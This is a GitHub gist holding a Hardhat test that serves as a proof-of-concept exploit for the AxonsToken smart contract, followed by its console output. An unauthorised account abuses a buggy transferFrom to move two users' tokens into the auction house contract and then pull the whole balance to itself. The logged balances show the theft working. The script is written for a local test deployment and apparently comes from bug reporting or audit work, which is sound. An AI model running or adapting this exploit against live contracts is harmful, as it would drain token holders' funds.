-
-
Save AshiqAmien/470add84111539a724c35350dc30a49f to your computer and use it in GitHub Desktop.
Steal all tokens through buggy transferFrom function in AxonsToken contract
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const { expect } = require("chai") | |
const { waffle, ethers } = require("hardhat") | |
let provider = ethers.getDefaultProvider(); | |
const { BN, expectRevert, balance } = require('@openzeppelin/test-helpers'); | |
const { web3 } = require("@openzeppelin/test-helpers/src/setup"); | |
function toBN (num) { | |
return new BN(num); | |
} | |
describe("AxonsToken buggy transferFrom", function () { | |
this.timeout("250000"); | |
let accounts; | |
let axonsToken; | |
before(async () => { | |
//fetch the accounts used for this test | |
accounts = await ethers.getSigners(); | |
//deploy the AxonsToken contract | |
const AxonsToken = await ethers.getContractFactory("AxonsToken"); | |
axonsToken = await AxonsToken.deploy("0xa3bdb8391e845ce26b1eaec416ce7dbf96e71cf7", "0x9e475913a586cfb15c348243871aa34ed213deaa"); | |
}); | |
it("steal everyone's tokens through the auctionhouse", async function () { | |
//Mint tokens to accounts 1 and 2 | |
await axonsToken.connect(accounts[1]).devmint(); | |
await axonsToken.connect(accounts[2]).devmint(); | |
console.log("account 1 token balance is: " + await axonsToken.balanceOf(accounts[1].address)); | |
console.log("account 2 token balance is: " + await axonsToken.balanceOf(accounts[2].address)); | |
console.log("account 3 token balance is: " + await axonsToken.balanceOf(accounts[3].address)); | |
console.log("auction house token balance is: " + await axonsToken.balanceOf(await axonsToken.auctionHouse())); | |
//Using account 3, use the buggy transferFrom to send it to the auction house contract | |
await axonsToken.connect(accounts[3]).transferFrom(accounts[1].address,await axonsToken.auctionHouse(),await axonsToken.balanceOf(accounts[1].address)); | |
await axonsToken.connect(accounts[3]).transferFrom(accounts[2].address,await axonsToken.auctionHouse(),await axonsToken.balanceOf(accounts[2].address)); | |
console.log("account 1 token balance is: " + await axonsToken.balanceOf(accounts[1].address)); | |
console.log("account 2 token balance is: " + await axonsToken.balanceOf(accounts[2].address)); | |
console.log("account 3 token balance is: " + await axonsToken.balanceOf(accounts[3].address)); | |
console.log("auction house token balance is: " + await axonsToken.balanceOf(await axonsToken.auctionHouse())); | |
//Using account 3 again, use the buggy transferFrom to pull all the tokens from the auctionhouse contract | |
await axonsToken.connect(accounts[3]).transferFrom(await axonsToken.auctionHouse(),accounts[3].address,await axonsToken.balanceOf(await axonsToken.auctionHouse())) | |
console.log("account 1 token balance is: " + await axonsToken.balanceOf(accounts[1].address)); | |
console.log("account 2 token balance is: " + await axonsToken.balanceOf(accounts[2].address)); | |
console.log("account 3 token balance is: " + await axonsToken.balanceOf(accounts[3].address)); | |
console.log("auction house token balance is: " + await axonsToken.balanceOf(await axonsToken.auctionHouse())); | |
}).timeout("250000"); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
AxonsToken buggy transferFrom | |
account 1 token balance is: 10000000000000000000000 | |
account 2 token balance is: 10000000000000000000000 | |
account 3 token balance is: 0 | |
auction house token balance is: 0 | |
account 1 token balance is: 0 | |
account 2 token balance is: 0 | |
account 3 token balance is: 0 | |
auction house token balance is: 20000000000000000000000 | |
account 1 token balance is: 0 | |
account 2 token balance is: 0 | |
account 3 token balance is: 20000000000000000000000 | |
auction house token balance is: 0 | |
✓ steal everyone's tokens through the auctionhouse (453ms) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment